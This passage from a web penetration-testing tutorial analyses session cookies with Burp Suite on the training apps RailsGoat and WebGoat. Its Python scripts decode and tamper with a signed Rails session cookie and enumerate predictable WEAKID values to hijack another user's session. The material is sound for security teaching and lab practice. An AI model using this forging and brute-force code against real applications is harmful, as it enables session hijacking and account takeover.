How to do it...

We will start by analyzing RailsGoat's session cookie. We could have used any PHPSESSID or JSESSIONID cookie, but we will take advantage of this one being a custom value to review some additional concepts. Configure your browser to use Burp Suite as a proxy and follow these steps:

  1. Log in to RailsGoat and look in the proxy's history for a response that sets a session cookie. The response should contain a Set-Cookie header that sets a cookie called _railsgoat_session.
  2. In this case, it is the response to the request to /railsgoat/session. Right-click on the URL, or on the body of the request or response, and select Send to Sequencer:
  3. Before continuing with Sequencer, let's see what the session cookie contains. This _railsgoat_session cookie looks like a base64-encoded string joined to a hexadecimal string by two hyphens (--). We'll explain this deduction later in this recipe. Select the value of the cookie, right-click on it, and select Send to Decoder.
  4. Once in Decoder, first decode it as URL, and then, on the second line, decode the result as base64:

The base64 part appears to contain three fields: session_id, a hexadecimal value, perhaps a hash; csrf_token, a value used to prevent Cross-Site Request Forgery (CSRF) attacks; and user_id, which seems to be just two characters, maybe a sequential number. The rest of the cookie (the part after the --) is not base64-encoded and looks like a random hash. In Rails' cookie-based session store it is in fact an HMAC-SHA1 signature over the base64 part, computed with the application's secret token: the server recomputes it on every request and discards any cookie whose signature does not match, so editing user_id in the decoded payload is not enough to impersonate another user unless the secret is known or the signature check is broken. Now we understand a little bit more about the session ID, and have learned a little bit about encoding and Burp Suite's Decoder.
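The framing just described can be reproduced outside Burp. The following Python script is an added example, not code from the book or from RailsGoat: it builds a cookie in the Rails CookieStore shape (base64 payload, two hyphens, hex HMAC-SHA1 of the payload computed with the application secret), splits and decodes it the way Decoder did above, and checks the signature the way the server does. The secret and the payload are constructed for the example; the real serialization (Ruby Marshal in Rails 3, JSON in later versions) is not reproduced, only the framing and the signature scheme.

```python
import base64
import hashlib
import hmac
from urllib.parse import quote, unquote

# Constructed for this example: a stand-in for the application's secret_token,
# not RailsGoat's real secret.
SECRET = "constructed-secret-token-not-the-real-one"

# Constructed payload with the three fields seen in Decoder. Real Rails cookies
# carry a Marshal/JSON serialization of the session hash; this JSON-looking byte
# string is only a stand-in so that the framing and signature can be shown.
PAYLOAD = (b'{"session_id":"4f2c8e1d9a7b6c5e3d2a1b0c9f8e7d6c",'
           b'"_csrf_token":"QmFzZTY0Q3NyZlRva2VuRXhhbXBsZQ==",'
           b'"user_id":2}')


def sign(data_b64: str, secret: str) -> str:
    """Hex HMAC-SHA1 over the base64 text, as Rails' signed CookieStore does."""
    return hmac.new(secret.encode(), data_b64.encode(), hashlib.sha1).hexdigest()


def build_cookie(payload: bytes, secret: str) -> str:
    """base64(payload) + '--' + signature, URL-encoded as it appears in Set-Cookie."""
    data_b64 = base64.b64encode(payload).decode()
    return quote(f"{data_b64}--{sign(data_b64, secret)}", safe="")


def split_cookie(cookie_value: str):
    """Decoder step 1: URL-decode, then split on the '--' separator.

    Neither the base64 alphabet nor hex contains '-', so the split is unambiguous.
    """
    raw = unquote(cookie_value)
    data_b64, sep, signature = raw.partition("--")
    if not sep:
        raise ValueError("no '--' separator: not a signed CookieStore value")
    return data_b64, signature


def decode_payload(cookie_value: str) -> bytes:
    """Decoder step 2: base64-decode the first part to expose the session fields."""
    data_b64, _ = split_cookie(cookie_value)
    return base64.b64decode(data_b64)


def verify(cookie_value: str, secret: str) -> bool:
    """What the server does on every request: recompute and compare the signature."""
    data_b64, signature = split_cookie(cookie_value)
    return hmac.compare_digest(sign(data_b64, secret), signature)


def tamper(cookie_value: str, new_payload: bytes) -> str:
    """Swap in a modified payload but keep the old signature (attacker without the secret)."""
    _, signature = split_cookie(cookie_value)
    data_b64 = base64.b64encode(new_payload).decode()
    return quote(f"{data_b64}--{signature}", safe="")


if __name__ == "__main__":
    cookie = build_cookie(PAYLOAD, SECRET)
    print("cookie:", cookie)
    print("decoded:", decode_payload(cookie))
    print("valid with secret:", verify(cookie, SECRET))
    forged = tamper(cookie, PAYLOAD.replace(b'"user_id":2', b'"user_id":1'))
    print("forged decodes to:", decode_payload(forged))
    print("forged accepted:", verify(forged, SECRET))
```

Run it against a real _railsgoat_session value by passing the captured cookie to decode_payload; verify will only return True if you also have the application's secret, which is exactly why the signature part matters more than the readable fields.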

  5. Let's continue with our analysis in Sequencer. Go to the Sequencer tab in Burp Suite and ensure that the correct request and cookie are selected:
  6. We know the cookie is base64-encoded, so go to Analysis Options and select Base64-decode before analyzing. This way, Burp Suite analyzes the decoded contents of the cookie rather than the encoded text.
  7. Go back to the Live capture tab and click on Start live capture. A new window will appear; wait for it to finish. It will take some time, as Burp re-issues the request repeatedly to collect a sample of fresh cookies.
  8. Once it is finished, click on Analyze now:

We can see that the overall quality of randomness is rated as excellent; this means the values are not easily guessable by an attacker. Note that Sequencer estimates the statistical randomness of the sample it collected: a good score rules out obvious patterns, but it does not by itself prove that the generator is cryptographically secure. Feel free to explore all the result tabs.

  9. That was an example of a good quality session cookie; let's see a not-so-good one this time. Log in to WebGoat and go to Session Management Flaws | Hijack a Session.
  10. This exercise is about bypassing a login form by hijacking a valid session ID. Attempt a login with any random username and password, just to get the request recorded in Burp Suite:
  11. In this case, the request that sets the session cookie is the one that first loads the exercise; search in Burp Suite's history for a response with the Set-Cookie: WEAKID= header. This ID is merely numbers separated by a hyphen.
  12. Send that request to Sequencer.
  13. Select the WEAKID cookie as the target to analyze.
  14. Start the live capture, wait for it to finish, and execute the analysis:

For this ID, the estimated quality is extremely poor. Going to the character-level analysis gives a better idea of why:

This chart shows the degree of change, or significance, of each character position across the sample. We see that significance increases from position 2 to position 3 and from 3 to 4, and then falls again at position 5, which is the location of the hyphen. This is the signature of a counter: the rightmost digits change on every sample while the leftmost stay fixed. It suggests that the first part of the ID is incremental, and that the same may apply to the second part, but with a different rate.
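The character-level chart can be reproduced on a captured sample with a few lines of code. The following Python script is an added example, not code from the book or from WebGoat: it generates a constructed sample of IDs in the WEAKID shape (a five-digit counter, a hyphen, and a millisecond timestamp; the values are made up, not captured), computes the Shannon entropy of each character position, which is what the Sequencer chart shows as significance, and then uses that structure to enumerate candidate IDs for the next session, which is the brute force the Hijack a Session exercise calls for. The counter start, the timestamp and the gaps between sessions are assumptions of the example.

```python
import math
from collections import Counter


def make_samples(n=200, start=18900, t0=1441713788094):
    """Constructed sample in the WEAKID shape: counter '-' millisecond timestamp.

    The counter grows by one per session; the timestamp grows by an irregular but
    small number of milliseconds, mimicking sessions created in quick succession.
    Values are made up for this example, not captured from WebGoat.
    """
    ids, t = [], t0
    for i in range(n):
        t += 37 + (i * 11) % 53          # assumed gap between sessions, in ms
        ids.append(f"{start + i}-{t}")
    return ids


def position_entropy(ids):
    """Shannon entropy (bits) of each character position across the sample.

    0 bits means the position never changes (a fixed prefix, or the hyphen);
    log2(10) ~= 3.32 bits is the maximum for a decimal digit.
    """
    width = len(ids[0])
    if any(len(s) != width for s in ids):
        raise ValueError("samples must have equal length for positional analysis")
    total = len(ids)
    bits = []
    for pos in range(width):
        counts = Counter(s[pos] for s in ids)
        h = -sum(c / total * math.log2(c / total) for c in counts.values())
        bits.append(round(h, 3))
    return bits


def total_bits(ids):
    """Upper bound on the entropy an attacker has to guess, summed over positions."""
    return round(sum(position_entropy(ids)), 3)


def hijack_candidates(last_seen, window_ms):
    """Enumerate IDs the next session may receive, given the last one observed.

    The counter is predicted exactly (last + 1); the timestamp is brute-forced over
    a window of milliseconds after the last observed value.
    """
    counter, ts = last_seen.split("-")
    nxt, base = int(counter) + 1, int(ts)
    return [f"{nxt}-{base + d}" for d in range(1, window_ms + 1)]


if __name__ == "__main__":
    sample = make_samples()
    for pos, h in enumerate(position_entropy(sample)):
        print(f"position {pos:2d} ('{sample[0][pos]}' in first sample): {h:5.2f} bits")
    print("total:", total_bits(sample), "bits (a 32-hex-char random ID scores ~128)")
    cands = hijack_candidates(sample[-2], 200)
    print("next id found among", len(cands), "candidates:", sample[-1] in cands)
```

To use it on real data, replace make_samples with the WEAKID values copied from Sequencer's token list; the positions that score near zero are the ones an attacker never has to guess, and the candidate list is what you would feed to Intruder in the exercise.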
